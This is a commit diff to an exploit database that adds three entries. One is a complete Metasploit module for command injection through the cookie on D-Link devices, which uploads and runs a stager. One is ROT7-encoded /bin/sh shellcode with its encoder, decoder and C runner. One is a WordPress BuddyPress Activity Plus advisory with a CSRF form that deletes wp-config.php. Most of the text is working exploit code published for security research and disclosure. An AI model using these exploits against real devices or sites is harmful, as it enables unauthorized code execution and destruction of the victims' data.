DB: 2015-07-18

3 new exploits
2015-07-18 05:02:00 +00:00 · 2015-07-18 05:02:00 +00:00 · e4d0bdd544
commit e4d0bdd544
parent 5454188b4e
4 changed files with 321 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -33849,6 +33849,7 @@ id,file,description,date,author,platform,type,port
 37534,platforms/php/webapps/37534.txt,"WordPress Easy2Map Plugin 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",php,webapps,80
 37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - SEH Buffer Overflow",2015-07-08,Vulnerability-Lab,windows,local,0
 37494,platforms/php/webapps/37494.txt,"Wordpress S3Bubble Cloud Video With Adverts & Analytics 0.7 - Arbitrary File Download",2015-07-05,CrashBandicot,php,webapps,0
 37495,platforms/lin_x86/shellcode/37495.py,"Linux x86 /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0
 37500,platforms/php/webapps/37500.txt,"Funeral Script PHP Cross Site Scripting and SQL Injection Vulnerabilities",2012-06-17,snup,php,webapps,0
 37501,platforms/php/webapps/37501.rb,"WordPress Generic Plugin Arbitrary File Upload Vulnerability",2012-07-13,KedAns-Dz,php,webapps,0
 37502,platforms/php/webapps/37502.txt,"Elite Bulletin Board Multiple SQL Injection Vulnerabilities",2012-07-15,ToXiC,php,webapps,0
@ -33960,3 +33961,5 @@ id,file,description,date,author,platform,type,port
 37624,platforms/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - CSRF and XSS Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0
 37625,platforms/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",hardware,webapps,0
 37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and RCE",2015-07-16,"Pierre Kim",hardware,webapps,0
 37628,platforms/hardware/remote/37628.rb,"D-Link Cookie Command Execution",2015-07-17,metasploit,hardware,remote,0
 37629,platforms/php/webapps/37629.txt,"WordPress BuddyPress Activity Plus Plugin 1.5 - CSRF Vulnerability",2015-07-17,"Tom Adams",php,webapps,80
--- a/platforms/hardware/remote/37628.rb
+++ b/platforms/hardware/remote/37628.rb
@ -0,0 +1,152 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link Cookie Command Execution',
      'Description'    => %q{
        This module exploits an anonymous remote upload and code execution vulnerability on different
        D-Link devices. The vulnerability is a command injection in the cookie handling process of the
        lighttpd web server when handling specially crafted cookie values. This module has been
        successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment.
      },
      'Author'         =>
        [
          'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # vulnerability discovery and initial PoC
          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'linux',
      'References'     =>
        [
          ['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC
        ],
      'DisclosureDate' => 'Jun 12 2015',
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Targets' =>
        [
          [ 'MIPS Little Endian',  # unknown if there are LE devices out there ... but in case we have a target
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_MIPSLE
            }
          ],
          [ 'MIPS Big Endian',
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_MIPSBE
            }
          ]
        ],
      'DefaultTarget'    => 1
      ))
  end
  def check
    begin
      res = send_request_cgi({
        'uri'    => '/',
        'method' => 'GET'
      })
      if res && res.headers["Server"] =~ /lighttpd\/1\.4\.34/
        return Exploit::CheckCode::Detected
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end
    Exploit::CheckCode::Unknown
  end
  def exploit
    print_status("#{peer} - Trying to access the device ...")
    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
    end
    print_status("#{peer} - Uploading stager ...")
    @counter = 1
    execute_cmdstager(
      :flavor  => :echo,
      :linemax => 95  # limited by our upload, larger payloads crash the web server
    )
    print_status("#{peer} - creating payload and executing it ...")
    (1 .. @counter).each do |act_file|
      # the http server blocks access to our files ... we copy it to a new one
      # the length of our command is restricted to 19 characters
      cmd = "cp /t*/#{act_file} /tmp/#{act_file+@counter}"
      execute_final_command(cmd)
      cmd = "chmod +x /tmp/#{act_file+@counter}"
      execute_final_command(cmd)
      cmd = "/tmp/#{act_file+@counter}"
      execute_final_command(cmd)
      cmd = "rm /tmp/#{act_file}"
      execute_final_command(cmd)
      cmd = "rm /tmp/#{act_file+@counter}"
      execute_final_command(cmd)
    end
  end
  def execute_command(cmd,opts)
    # upload our stager to a shell script
    # upload takes quite long because there is no response from the web server
    file_upload = "#!/bin/sh\n"
    file_upload << cmd << "\n"
    post_data = Rex::MIME::Message.new
    post_data.add_part(file_upload, nil, "binary", "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{@counter}\"")
    post_data.bound = "-#{rand_text_alpha(12)}--"
    file = post_data.to_s
    @counter = @counter + 1
    begin
      send_request_cgi({
        'method'        => 'POST',
        'uri'           => "/web_cgi.cgi",
        'vars_get' => {
          '&request' =>'UploadFile',
          'path' => '/tmp/'
        },
        'encode_params' => false,
        'ctype'         => "multipart/form-data; boundary=#{post_data.bound}",
        'data'          => file
      })
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
  def execute_final_command(cmd)
    # very limited space - larger commands crash the webserver
    fail_with(Failure::Unknown, "#{peer} - Generated command for injection is too long") if cmd.length > 18
    begin
      send_request_cgi({
        'method'        => 'GET',
        'uri'           => "/",
        'cookie'        => "i=`#{cmd}`"
      }, 5)
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
 end
--- a/platforms/lin_x86/shellcode/37495.py
+++ b/platforms/lin_x86/shellcode/37495.py
@ -0,0 +1,104 @@
 # Shellcode Title: ROT7
 # Date: 5 July 2015
 # Exploit Author: Artem Tsvetkov
 # Software Link:
 https://github.com/adeptex/SLAE/tree/master/Assignment-6/rot7
 # Tested on: Kali GNU/Linux 1.1.0
 # Platform: x86 Linux
 This code was created as an exercise for the SecurityTube Linux Assembly
 Expert (SLAE).
 The following will produce rot7-encoded shellcode using a custom scheme to
 dynamically set the shellcode length. The length is used by the decoder to
 determine when it should stop decoding.
 #!/usr/bin/python
 # Python ROT-7 Encoder
 # execve 24 bytes
 shellcode = (
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
    "\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
 )
 # byte[0] == shellcode length
 encoded = "\\x%02x," % len(bytearray(shellcode))
 encoded2 = "0x%02x," % len(bytearray(shellcode))
 print 'Encoded shellcode ...'
 for x in bytearray(shellcode) :
 # boundary is computed as 255-ROT(x) where x, the amount to rotate by
    if x > 248:
        encoded += '\\x'
        encoded += '%02x' %(7 -(256 - x))
        encoded2 += '0x'
        encoded2 += '%02x,' %(7 -(256 - x))
    else:
        encoded += '\\x'
        encoded += '%02x'%(x+7)
        encoded2 += '0x'
        encoded2 += '%02x,' %(x+7)
 print '\n%s\n\n%s\n\nShellcode Length: %d\n' % (encoded, encoded2,
 len(bytearray(shellcode)))
 The following is the NASM decoder:
 ; ROT7 NASM decoder
 global _start
 section .text
 _start:
    jmp short stage
 decoder:
    pop esi                ; shellcode address
    mov al, byte [esi]        ; shellcode length
    xor ecx, ecx             ; position
 decode:
    mov bl, byte [esi+ecx+1]    ; get rot'ed byted
    sub bl, 0x7            ; rot it back (-7)
    mov byte [esi+ecx], bl        ; store it in shellcode
    inc ecx                ; next position
    cmp al, cl            ; check if reached the end of shellcode
    jnz short decode         ;     if not, continue derot'ing
    jmp shellcode            ;    else, execute derot'ed shellcode
 stage:
    call decoder
    ; Shellcode Format:
    ;    byte[0]     = length of shellcode (max 0xff)
    ;    byte[1..]     = rot'ed shellcode
    shellcode: db
 0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87
 /*
 * Sample run
 *
 * Compile with: gcc rot7.c -o rot7
 *
 */
 #include<stdio.h>
 #include<string.h>
 unsigned char code[] = \
 "\xeb\x16\x5e\x8a\x06\x31\xc9\x8a\x5c\x0e\x01\x80\xeb\x07\x88\x1c\x0e\x41\x38\xc8\x75\xf1\xeb\x05\xe8\xe5\xff\xff\xff\x18\x38\xc7\x57\x6f\x36\x36\x7a\x6f\x6f\x36\x69\x70\x75\x90\xea\x38\xd0\x90\xd1\x71\x12\x5f\xd4\x87";
 int main()
 {
    printf("Shellcode Length:  %d\n", strlen(code));
    int (*ret)() = (int(*)())code;
    ret();
 }
--- a/platforms/php/webapps/37629.txt
+++ b/platforms/php/webapps/37629.txt
@ -0,0 +1,62 @@
 Details
 ================
 Software: BuddyPress Activity Plus
 Version: 1.5
 Homepage: http://wordpress.org/plugins/buddypress-activity-plus/
 Advisory report: https://security.dxw.com/advisories/csrf-and-arbitrary-file-deletion-in-buddypress-activity-plus-1-5/
 CVE: Awaiting assignment
 CVSS: 8.5 (High; AV:N/AC:L/Au:N/C:N/I:P/A:C)
 Description
 ================
 CSRF and arbitrary file deletion in BuddyPress Activity Plus 1.5
 Vulnerability
 ================
 An attacker can delete any file the PHP process can delete.
 For this to happen, a logged-in user would have to be tricked into clicking on a link controlled by the attacker. It is easy to make these links very convincing.
 Proof of concept
 ================
 Ensure your PHP user can do maximum damage:
 sudo chown www-data:www-data /var/vhosts/my-wordpress-site
 Visit a page containing this as a logged-in user and click submit:
 <form method=\"POST\" action=\"http://localhost/wp-admin/admin-ajax.php\">
  <input type=\"text\" name=\"action\" value=\"bpfb_remove_temp_images\">
  <input type=\"text\" name=\"data\" value=\"bpfb_photos[]=../../../../wp-config.php\">
  <input type=\"submit\">
 </form>
 If the server is set up so that the php user has more restricted permissions, then an attacker will at least be able to delete files from the uploads directory.
 Note that you can also delete as many things as you like at once – $_POST[‘data’] is run through parse_str() which parses it as a query string, so just keep adding “&bpfb_photos[]=path/to/file” to the end until you have all known files.
 There is an identical attack available only when BP Group Documents is also installed. Just replace “bpfb_remove_temp_images” with “bpfb_remove_temp_documents” and in data replace “bpfb_photos” with “bpfb_documents”.
 Mitigations
 ================
 Upgrade to version 1.6.2 or later
 If this is not possible, ensure that the PHP user on the server does not have permission to delete files like wp-config.php.
 Disclosure policy
 ================
 dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
 Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
 This vulnerability will be published if we do not receive a response to this report with 14 days.
 Timeline
 ================
 2013-08-22: Discovered
 2015-07-13: Reported to vendor via contact form at https://premium.wpmudev.org/contact/
 2015-07-13: Requested CVE
 2015-07-13: Vendor responded
 2015-07-14: Vendor reported issue fixed
 2015-07-14: Published
 Discovered by dxw:
 ================
 Tom Adams
 Please visit security.dxw.com for more information.